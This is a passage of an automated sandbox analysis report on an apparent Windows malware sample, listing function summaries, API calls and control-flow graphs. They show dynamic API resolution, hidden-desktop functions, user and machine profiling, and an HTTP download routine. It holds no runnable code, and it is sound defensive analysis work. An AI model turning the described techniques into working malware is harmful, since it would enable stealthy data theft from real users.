                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: e0aeed1acb7de490755dfeef169aabc8fc88b631198460a45ce100d76e432061
                                    • Instruction ID: ecc1d5526d462420c7a02d74401dc7ad22012e9476277f733faabc3130b58a3e
                                    • Opcode Fuzzy Hash: e0aeed1acb7de490755dfeef169aabc8fc88b631198460a45ce100d76e432061
                                    • Instruction Fuzzy Hash: F301D172A44208ABDB10DF99EC45BAEF7BCF748B21F00027AF929E3780D775590087A1
                                    Function 00F82A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00F82A6F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F82A76
                                    • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00F82A8A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: de1279d6383a8ed8655e4c1239f392725f35dc3eb088fea79cb003e4c6819f8d
                                    • Instruction ID: 29a3ae6ba50f8b4ce6dc970cbda1c554915e19942acb9239a62aeadd23e09b8d
                                    • Opcode Fuzzy Hash: de1279d6383a8ed8655e4c1239f392725f35dc3eb088fea79cb003e4c6819f8d
                                    • Instruction Fuzzy Hash: 3FF0BB71940208ABD710DF99DD45B9EB7BCF705B21F000126F925D3280D374190487A2
                                    Function 00F866E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 f866e0-f866e7 634 f866ed-f86af9 GetProcAddress * 43 633->634 635 f86afe-f86b92 LoadLibraryA * 8 633->635 634->635 636 f86c08-f86c0f 635->636 637 f86b94-f86c03 GetProcAddress * 5 635->637 638 f86cd2-f86cd9 636->638 639 f86c15-f86ccd GetProcAddress * 8 636->639 637->636 640 f86cdb-f86d4a GetProcAddress * 5 638->640 641 f86d4f-f86d56 638->641 639->638 640->641 642 f86de9-f86df0 641->642 643 f86d5c-f86de4 GetProcAddress * 6 641->643 644 f86f10-f86f17 642->644 645 f86df6-f86f0b GetProcAddress * 12 642->645 643->642 646 f86f19-f86f88 GetProcAddress * 5 644->646 647 f86f8d-f86f94 644->647 645->644 646->647 648 f86fc1-f86fc8 647->648 649 f86f96-f86fbc GetProcAddress * 2 647->649 650 f86fca-f86ff0 GetProcAddress * 2 648->650 651 f86ff5-f86ffc 648->651 649->648 650->651 652 f870ed-f870f4 651->652 653 f87002-f870e8 GetProcAddress * 10 651->653 654 f87152-f87159 652->654 655 f870f6-f8714d GetProcAddress * 4 652->655 653->652 656 f8715b-f87169 GetProcAddress 654->656 657 f8716e-f87175 654->657 655->654 656->657 658 f871d3 657->658 659 f87177-f871ce GetProcAddress * 4 657->659 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,00A85BD0), ref: 00F866F5
                                    • GetProcAddress.KERNEL32(74DD0000,00A85E10), ref: 00F8670D
                                    • GetProcAddress.KERNEL32(74DD0000,00A996A0), ref: 00F86726
                                    • GetProcAddress.KERNEL32(74DD0000,00A996D0), ref: 00F8673E
                                    • GetProcAddress.KERNEL32(74DD0000,00A99628), ref: 00F86756
                                    • GetProcAddress.KERNEL32(74DD0000,00A99640), ref: 00F8676F
                                    • GetProcAddress.KERNEL32(74DD0000,00A8B748), ref: 00F86787
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D238), ref: 00F8679F
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D418), ref: 00F867B8
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D2F8), ref: 00F867D0
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D208), ref: 00F867E8
                                    • GetProcAddress.KERNEL32(74DD0000,00A85BF0), ref: 00F86801
                                    • GetProcAddress.KERNEL32(74DD0000,00A85C30), ref: 00F86819
                                    • GetProcAddress.KERNEL32(74DD0000,00A85B30), ref: 00F86831
                                    • GetProcAddress.KERNEL32(74DD0000,00A85D30), ref: 00F8684A
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D2E0), ref: 00F86862
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D250), ref: 00F8687A
                                    • GetProcAddress.KERNEL32(74DD0000,00A8B798), ref: 00F86893
                                    • GetProcAddress.KERNEL32(74DD0000,00A85B50), ref: 00F868AB
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D3B8), ref: 00F868C3
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D328), ref: 00F868DC
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D3D0), ref: 00F868F4
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D478), ref: 00F8690C
                                    • GetProcAddress.KERNEL32(74DD0000,00A85B90), ref: 00F86925
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D280), ref: 00F8693D
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D4A8), ref: 00F86955
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D448), ref: 00F8696E
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D298), ref: 00F86986
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D2B0), ref: 00F8699E
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D220), ref: 00F869B7
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D310), ref: 00F869CF
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D268), ref: 00F869E7
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D2C8), ref: 00F86A00
                                    • GetProcAddress.KERNEL32(74DD0000,00A9A3B0), ref: 00F86A18
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D340), ref: 00F86A30
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D430), ref: 00F86A49
                                    • GetProcAddress.KERNEL32(74DD0000,00A85BB0), ref: 00F86A61
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D4F0), ref: 00F86A79
                                    • GetProcAddress.KERNEL32(74DD0000,00A85A70), ref: 00F86A92
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D490), ref: 00F86AAA
                                    • GetProcAddress.KERNEL32(74DD0000,00A9D358), ref: 00F86AC2
                                    • GetProcAddress.KERNEL32(74DD0000,00A85790), ref: 00F86ADB
                                    • GetProcAddress.KERNEL32(74DD0000,00A858D0), ref: 00F86AF3
                                    • LoadLibraryA.KERNEL32(00A9D370,00F8051F), ref: 00F86B05
                                    • LoadLibraryA.KERNEL32(00A9D4D8), ref: 00F86B16
                                    • LoadLibraryA.KERNEL32(00A9D388), ref: 00F86B28
                                    • LoadLibraryA.KERNEL32(00A9D4C0), ref: 00F86B3A
                                    • LoadLibraryA.KERNEL32(00A9D3A0), ref: 00F86B4B
                                    • LoadLibraryA.KERNEL32(00A9D3E8), ref: 00F86B5D
                                    • LoadLibraryA.KERNEL32(00A9D400), ref: 00F86B6F
                                    • LoadLibraryA.KERNEL32(00A9D460), ref: 00F86B80
                                    • GetProcAddress.KERNEL32(75290000,00A857B0), ref: 00F86B9C
                                    • GetProcAddress.KERNEL32(75290000,00A9D598), ref: 00F86BB4
                                    • GetProcAddress.KERNEL32(75290000,00A98FD8), ref: 00F86BCD
                                    • GetProcAddress.KERNEL32(75290000,00A9D568), ref: 00F86BE5
                                    • GetProcAddress.KERNEL32(75290000,00A85830), ref: 00F86BFD
                                    • GetProcAddress.KERNEL32(73440000,00A8B8B0), ref: 00F86C1D
                                    • GetProcAddress.KERNEL32(73440000,00A85870), ref: 00F86C35
                                    • GetProcAddress.KERNEL32(73440000,00A8B9C8), ref: 00F86C4E
                                    • GetProcAddress.KERNEL32(73440000,00A9D640), ref: 00F86C66
                                    • GetProcAddress.KERNEL32(73440000,00A9D5B0), ref: 00F86C7E
                                    • GetProcAddress.KERNEL32(73440000,00A857D0), ref: 00F86C97
                                    • GetProcAddress.KERNEL32(73440000,00A857F0), ref: 00F86CAF
                                    • GetProcAddress.KERNEL32(73440000,00A9D580), ref: 00F86CC7
                                    • GetProcAddress.KERNEL32(752C0000,00A85810), ref: 00F86CE3
                                    • GetProcAddress.KERNEL32(752C0000,00A85850), ref: 00F86CFB
                                    • GetProcAddress.KERNEL32(752C0000,00A9D5C8), ref: 00F86D14
                                    • GetProcAddress.KERNEL32(752C0000,00A9D508), ref: 00F86D2C
                                    • GetProcAddress.KERNEL32(752C0000,00A85930), ref: 00F86D44
                                    • GetProcAddress.KERNEL32(74EC0000,00A8B770), ref: 00F86D64
                                    • GetProcAddress.KERNEL32(74EC0000,00A8B9F0), ref: 00F86D7C
                                    • GetProcAddress.KERNEL32(74EC0000,00A9D628), ref: 00F86D95
                                    • GetProcAddress.KERNEL32(74EC0000,00A856F0), ref: 00F86DAD
                                    • GetProcAddress.KERNEL32(74EC0000,00A85750), ref: 00F86DC5
                                    • GetProcAddress.KERNEL32(74EC0000,00A8B810), ref: 00F86DDE
                                    • GetProcAddress.KERNEL32(75BD0000,00A9D5E0), ref: 00F86DFE
                                    • GetProcAddress.KERNEL32(75BD0000,00A85770), ref: 00F86E16
                                    • GetProcAddress.KERNEL32(75BD0000,00A99018), ref: 00F86E2F
                                    • GetProcAddress.KERNEL32(75BD0000,00A9D5F8), ref: 00F86E47
                                    • GetProcAddress.KERNEL32(75BD0000,00A9D610), ref: 00F86E5F
                                    • GetProcAddress.KERNEL32(75BD0000,00A859D0), ref: 00F86E78
                                    • GetProcAddress.KERNEL32(75BD0000,00A85890), ref: 00F86E90
                                    • GetProcAddress.KERNEL32(75BD0000,00A9D670), ref: 00F86EA8
                                    • GetProcAddress.KERNEL32(75BD0000,00A9D520), ref: 00F86EC1
                                    • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 00F86ED7
                                    • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 00F86EEE
                                    • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00F86F05
                                    • GetProcAddress.KERNEL32(75A70000,00A85A10), ref: 00F86F21
                                    • GetProcAddress.KERNEL32(75A70000,00A9D658), ref: 00F86F39
                                    • GetProcAddress.KERNEL32(75A70000,00A9D538), ref: 00F86F52
                                    • GetProcAddress.KERNEL32(75A70000,00A9D688), ref: 00F86F6A
                                    • GetProcAddress.KERNEL32(75A70000,00A9D6A0), ref: 00F86F82
                                    • GetProcAddress.KERNEL32(75450000,00A85A30), ref: 00F86F9E
                                    • GetProcAddress.KERNEL32(75450000,00A858B0), ref: 00F86FB6
                                    • GetProcAddress.KERNEL32(75DA0000,00A858F0), ref: 00F86FD2
                                    • GetProcAddress.KERNEL32(75DA0000,00A9D550), ref: 00F86FEA
                                    • GetProcAddress.KERNEL32(6F070000,00A856B0), ref: 00F8700A
                                    • GetProcAddress.KERNEL32(6F070000,00A85A50), ref: 00F87022
                                    • GetProcAddress.KERNEL32(6F070000,00A85A90), ref: 00F8703B
                                    • GetProcAddress.KERNEL32(6F070000,00A9D6B8), ref: 00F87053
                                    • GetProcAddress.KERNEL32(6F070000,00A85910), ref: 00F8706B
                                    • GetProcAddress.KERNEL32(6F070000,00A85950), ref: 00F87084
                                    • GetProcAddress.KERNEL32(6F070000,00A859F0), ref: 00F8709C
                                    • GetProcAddress.KERNEL32(6F070000,00A85970), ref: 00F870B4
                                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00F870CB
                                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00F870E2
                                    • GetProcAddress.KERNEL32(75AF0000,00A9CF80), ref: 00F870FE
                                    • GetProcAddress.KERNEL32(75AF0000,00A990F8), ref: 00F87116
                                    • GetProcAddress.KERNEL32(75AF0000,00A9D178), ref: 00F8712F
                                    • GetProcAddress.KERNEL32(75AF0000,00A9D100), ref: 00F87147
                                    • GetProcAddress.KERNEL32(75D90000,00A856D0), ref: 00F87163
                                    • GetProcAddress.KERNEL32(6CE70000,00A9D0A0), ref: 00F8717F
                                    • GetProcAddress.KERNEL32(6CE70000,00A85710), ref: 00F87197
                                    • GetProcAddress.KERNEL32(6CE70000,00A9D070), ref: 00F871B0
                                    • GetProcAddress.KERNEL32(6CE70000,00A9D040), ref: 00F871C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                    • API String ID: 2238633743-3468015613
                                    • Opcode ID: 97837dec85125641362fbc84a07040909c8269827117f817dae29e5722e32d11
                                    • Instruction ID: 5c718fee32212fb986f58c1d9854fafe5ee9bf296d682a9115ab3c433ff15896
                                    • Opcode Fuzzy Hash: 97837dec85125641362fbc84a07040909c8269827117f817dae29e5722e32d11
                                    • Instruction Fuzzy Hash: 14624EF56152089FD77CDFA4E888A2637B9F789609318893DE976C334CD734A890DB21
                                    Function 00F7F1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F7F1D5
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7F1F1
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F7F1FC
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7F215
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F7F220
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7F239
                                    • lstrcpy.KERNEL32(00000000,00F94FA0), ref: 00F7F25E
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7F28C
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7F2C0
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F7F2F0
                                    • lstrlen.KERNEL32(00A85B10), ref: 00F7F315
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID: ERROR
                                    • API String ID: 367037083-2861137601
                                    • Opcode ID: 8ea6ab91b29c56f43c706f3dbf9ca0cef55c1eb4c3756340e248a72828e73f46
                                    • Instruction ID: 8635debaa4cb728896f3553d6a4f4c0a494016db38b3d233d603d1bd55c38170
                                    • Opcode Fuzzy Hash: 8ea6ab91b29c56f43c706f3dbf9ca0cef55c1eb4c3756340e248a72828e73f46
                                    • Instruction Fuzzy Hash: 5BA26A70D016058FDB24DF68C948A5AB7F4BF48324B18C07EE829DB255EB35DC46EB52
                                    Function 00F7FFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F80013
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F800BD
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F800E1
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F800EC
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F80110
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F8011B
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F8013F
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F8015A
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F80189
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F80194
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F801C3
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F801CE
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F80206
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F80250
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F80288
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F8059B
                                    • lstrlen.KERNEL32(00A85C70), ref: 00F805AB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F805D7
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F805E3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F8060E
                                    • lstrlen.KERNEL32(00A9E4A8), ref: 00F80625
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F8064C
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F80658
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F80681
                                    • lstrlen.KERNEL32(00A85AF0), ref: 00F80698
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F806C9
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F806D5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F80706
                                    • lstrcpy.KERNEL32(00000000,00A99098), ref: 00F8074B
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61557
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61579
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F6159B
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F615FF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F8077F
                                    • lstrcpy.KERNEL32(00000000,00A9E418), ref: 00F807E7
                                    • lstrcpy.KERNEL32(00000000,00A99288), ref: 00F80858
                                    • lstrcpy.KERNEL32(00000000,fplugins), ref: 00F808CF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F80928
                                    • lstrcpy.KERNEL32(00000000,00A99108), ref: 00F809F8
                                      • Part of subcall function 00F624E0: lstrcpy.KERNEL32(00000000,?), ref: 00F62528
                                      • Part of subcall function 00F624E0: lstrcpy.KERNEL32(00000000,?), ref: 00F6254E
                                      • Part of subcall function 00F624E0: lstrcpy.KERNEL32(00000000,?), ref: 00F62577
                                    • lstrcpy.KERNEL32(00000000,00A99278), ref: 00F80ACE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F80B81
                                    • lstrcpy.KERNEL32(00000000,00A99278), ref: 00F80D58
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID: fplugins
                                    • API String ID: 2500673778-38756186
                                    • Opcode ID: a1dc26483cf4bcad8d17cd6266096375d79d16b12cd80383ba40b3e95cb023d3
                                    • Instruction ID: 624184b2a314c3eba5788aea8cccee6ba21efa657ff12e9957aa66cf4a5bfdf0
                                    • Opcode Fuzzy Hash: a1dc26483cf4bcad8d17cd6266096375d79d16b12cd80383ba40b3e95cb023d3
                                    • Instruction Fuzzy Hash: C4E27C70A053408FD774EF29C888B9AB7E4BF88324F58856EE44DCB252DB35D846DB52
                                    Function 00F66C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2234 f66c40-f66c64 call f62930 2237 f66c66-f66c6b 2234->2237 2238 f66c75-f66c97 call f64bc0 2234->2238 2237->2238 2239 f66c6d-f66c6f lstrcpy 2237->2239 2242 f66caa-f66cba call f62930 2238->2242 2243 f66c99 2238->2243 2239->2238 2247 f66cbc-f66cc2 lstrcpy 2242->2247 2248 f66cc8-f66cf5 InternetOpenA StrCmpCA 2242->2248 2245 f66ca0-f66ca8 2243->2245 2245->2242 2245->2245 2247->2248 2249 f66cf7 2248->2249 2250 f66cfa-f66cfc 2248->2250 2249->2250 2251 f66d02-f66d22 InternetConnectA 2250->2251 2252 f66ea8-f66ebb call f62930 2250->2252 2253 f66ea1-f66ea2 InternetCloseHandle 2251->2253 2254 f66d28-f66d5d HttpOpenRequestA 2251->2254 2261 f66ebd-f66ebf 2252->2261 2262 f66ec9-f66ee0 call f62a20 * 2 2252->2262 2253->2252 2256 f66e94-f66e9e InternetCloseHandle 2254->2256 2257 f66d63-f66d65 2254->2257 2256->2253 2259 f66d67-f66d77 InternetSetOptionA 2257->2259 2260 f66d7d-f66dad HttpSendRequestA HttpQueryInfoA 2257->2260 2259->2260 2264 f66dd4-f66de4 call f83d90 2260->2264 2265 f66daf-f66dd3 call f871e0 call f62a20 * 2 2260->2265 2261->2262 2266 f66ec1-f66ec3 lstrcpy 2261->2266 2264->2265 2274 f66de6-f66de8 2264->2274 2266->2262 2277 f66dee-f66e07 InternetReadFile 2274->2277 2278 f66e8d-f66e8e InternetCloseHandle 2274->2278 2277->2278 2280 f66e0d 2277->2280 2278->2256 2282 f66e10-f66e15 2280->2282 2282->2278 2283 f66e17-f66e3d call f87310 2282->2283 2286 f66e44-f66e51 call f62930 